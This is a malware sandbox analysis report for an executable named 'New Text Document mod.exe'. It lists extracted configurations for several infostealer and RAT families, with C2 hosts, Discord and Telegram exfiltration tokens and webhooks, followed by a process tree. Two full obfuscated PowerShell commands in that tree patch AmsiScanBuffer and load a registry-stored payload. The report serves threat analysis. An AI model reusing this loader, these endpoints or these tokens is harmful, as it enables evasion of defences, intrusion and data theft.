Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

31/12/2024, 21:35

241231-1fmqnszqft 10

31/12/2024, 21:27

241231-1axzfssnek 10

16/12/2024, 05:27

241216-f5kx6awmh1 10

14/12/2024, 20:23

241214-y6jqlasrhy 10

14/12/2024, 20:22

241214-y51bysvmbk 10

14/12/2024, 20:13

241214-yzc98svkfr 10

14/12/2024, 13:14

241214-qgw1masrcy 10

14/12/2024, 13:12

241214-qfk7qsvlaq 3

12/12/2024, 18:19

241212-wymq6ssnat 10

Analysis

  • max time kernel
    108s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/12/2024, 18:16

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMxNTQxMDg0NDg3NTQ4OTI4MA.Gx5ptK.HY1OYsjGMP1MsOoyD2E7T9pCvkfHTdOPozmb_c

  • server_id

    1315411300192616569

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:8080

101.99.92.189:8080

Mutex

d5gQ6Zf7Tzih1Pi1

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

44caliber

C2

https://discord.com/api/webhooks/1296494108667416678/ZASeLgYlw4OZSUv8h9jKQd4eY6ktpyF3T4vMXTNf0Ppbac5asKxIs_xZz8YEc__J4qsO

Extracted

Family

xworm

C2

127.0.0.1:58963

login-donor.gl.at.ply.gg:58963

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    MicrosoftProfile.exe

  • pastebin_url

    https://pastebin.com/raw/yDTTG7qZ

Extracted

Family

xworm

Version

3.1

C2

camp.zapto.org:7771

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

stealc

Botnet

Voov1

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Extracted

Family

stealc

Botnet

Voov3

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Extracted

Family

stealc

Botnet

QQTalk2

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775

https://api.telegram.org/bot8081835502:AAFtGgtMdAzFeWYBpQcGx83fjDR_25zfjK0/sendDocument?chat_id=7538374929&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessag

Extracted

Family

lumma

C2

https://infect-crackle.cyou/api

https://covery-mover.biz/api

https://drive-connect.cyou/api

Signatures

  • 44Caliber

    An open source infostealer written in C#.

  • 44Caliber family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 8 IoCs
  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Adds policy Run key to start application 2 TTPs 4 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 53 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 24 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 9 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 21 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 7 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1020
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2f556b46-b4fa-40a1-9d8d-75055e262b48}
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of FindShellTrayWindow
          PID:3112
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im conhost.exe
            3⤵
            • Kills process with taskkill
            PID:2984
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:5080
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
          • Suspicious use of SetThreadContext
          PID:676
          • C:\Windows\system32\lsass.exe
            "C:\Windows\system32\lsass.exe"
            2⤵
            • Drops file in System32 directory
            PID:4588
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:732
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1040
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1060
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1184
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3004
                        • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2396
                          • C:\Windows\explorer.exe
                            explorer.exe
                            3⤵
                              PID:6048
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                              3⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              PID:6024
                              • C:\Windows\system32\PING.EXE
                                "C:\Windows\system32\PING.EXE" 127.1.10.1
                                4⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:3844
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JKDOUiagHrSJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$umeyVVLDGToceF,[Parameter(Position=1)][Type]$ZrAdVhcZsG)$fVXKhXXHDLa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType(''+'M'+'y'+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'at'+[Char](101)+''+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'la'+'s'+''+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$fVXKhXXHDLa.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'ecia'+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'P'+'u'+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$umeyVVLDGToceF).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+'m'+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$fVXKhXXHDLa.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+''+'k'+'e',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+'S'+'ig,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$ZrAdVhcZsG,$umeyVVLDGToceF).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e,'+'M'+'a'+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $fVXKhXXHDLa.CreateType();}$bXtmKZSCpTVYx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'tem.'+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'od'+[Char](115)+'');$wFvYxvohMAUEzS=$bXtmKZSCpTVYx.GetMethod(''+'G'+''+'e'+''+'t'+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kcdKkUtmtPkDSiHcEjk=JKDOUiagHrSJ @([String])([IntPtr]);$EdgixwyRFbiznMIWkxEVmz=JKDOUiagHrSJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WjgfhfLEWhZ=$bXtmKZSCpTVYx.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oFyepkmkifGwOa=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$WjgfhfLEWhZ,[Object](''+'L'+'o'+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+'yA')));$qKBxhpyTCNRWlxRjW=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$WjgfhfLEWhZ,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+'ua'+'l'+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$CBYkFaL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oFyepkmkifGwOa,$kcdKkUtmtPkDSiHcEjk).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+'l'+'');$hGgbzRwWIwmVzgVZl=$wFvYxvohMAUEzS.Invoke($Null,@([Object]$CBYkFaL,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+'e'+'r'+'')));$MQjGkNOzLa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qKBxhpyTCNRWlxRjW,$EdgixwyRFbiznMIWkxEVmz).Invoke($hGgbzRwWIwmVzgVZl,[uint32]8,4,[ref]$MQjGkNOzLa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hGgbzRwWIwmVzgVZl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qKBxhpyTCNRWlxRjW,$EdgixwyRFbiznMIWkxEVmz).Invoke($hGgbzRwWIwmVzgVZl,[uint32]8,0x20,[ref]$MQjGkNOzLa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+''+'s'+''+[Char](115)+''+'t'+'a'+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            PID:2792
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IatsIrXKqRUi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tBgnKfIAsRoNDB,[Parameter(Position=1)][Type]$BMKFNGQnYY)$yyKwRIgiJdI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+'ry'+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+'l'+'eg'+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+'C'+'la'+'s'+'s,'+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$yyKwRIgiJdI.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+'i'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$tBgnKfIAsRoNDB).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$yyKwRIgiJdI.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+'ke','P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$BMKFNGQnYY,$tBgnKfIAsRoNDB).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+''+'d'+'');Write-Output $yyKwRIgiJdI.CreateType();}$kNeUHdWwRUBMt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+'m'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$pqiKfkcfZnbZUs=$kNeUHdWwRUBMt.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dPmhKfslVrSewqGQWEL=IatsIrXKqRUi @([String])([IntPtr]);$CxAkEzjAKKRynRZcRnroip=IatsIrXKqRUi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XGffGHvokiP=$kNeUHdWwRUBMt.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+'od'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32.'+[Char](100)+'l'+[Char](108)+'')));$jlMcWRhAYaEWJr=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$XGffGHvokiP,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'y'+[Char](65)+'')));$ubfsRlzJTLxedNVJi=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$XGffGHvokiP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+'ct')));$PCuKzbd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jlMcWRhAYaEWJr,$dPmhKfslVrSewqGQWEL).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+'l'+'');$KpfnIWStGwKffFFYy=$pqiKfkcfZnbZUs.Invoke($Null,@([Object]$PCuKzbd,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$lFdXhORsVY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ubfsRlzJTLxedNVJi,$CxAkEzjAKKRynRZcRnroip).Invoke($KpfnIWStGwKffFFYy,[uint32]8,4,[ref]$lFdXhORsVY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KpfnIWStGwKffFFYy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ubfsRlzJTLxedNVJi,$CxAkEzjAKKRynRZcRnroip).Invoke($KpfnIWStGwKffFFYy,[uint32]8,0x20,[ref]$lFdXhORsVY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](114)+''+[Char](117)+''+'t'+''+[Char](115)+'s'+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:2920
                          • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            2⤵
                              PID:3672
                              • C:\Windows\explorer.exe
                                explorer.exe
                                3⤵
                                  PID:5612
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                  3⤵
                                  • System Network Configuration Discovery: Internet Connection Discovery
                                  PID:7016
                              • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                2⤵
                                  PID:4496
                                • C:\Windows\SysWOW64\ruts\rutserv.exe
                                  C:\Windows\SysWOW64\ruts\rutserv.exe
                                  2⤵
                                    PID:7224
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                    PID:1220
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                    1⤵
                                      PID:1272
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                      1⤵
                                        PID:1320
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                        1⤵
                                          PID:1348
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                          1⤵
                                            PID:1384
                                            • C:\Windows\system32\sihost.exe
                                              sihost.exe
                                              2⤵
                                                PID:2712
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1500
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                1⤵
                                                  PID:1508
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                  1⤵
                                                    PID:1524
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                    1⤵
                                                      PID:1632
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                      1⤵
                                                        PID:1712
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                        1⤵
                                                          PID:1720
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1804
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                            1⤵
                                                              PID:1836
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                              1⤵
                                                                PID:1848
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                1⤵
                                                                  PID:1864
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                  1⤵
                                                                    PID:1948
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                    1⤵
                                                                      PID:1996
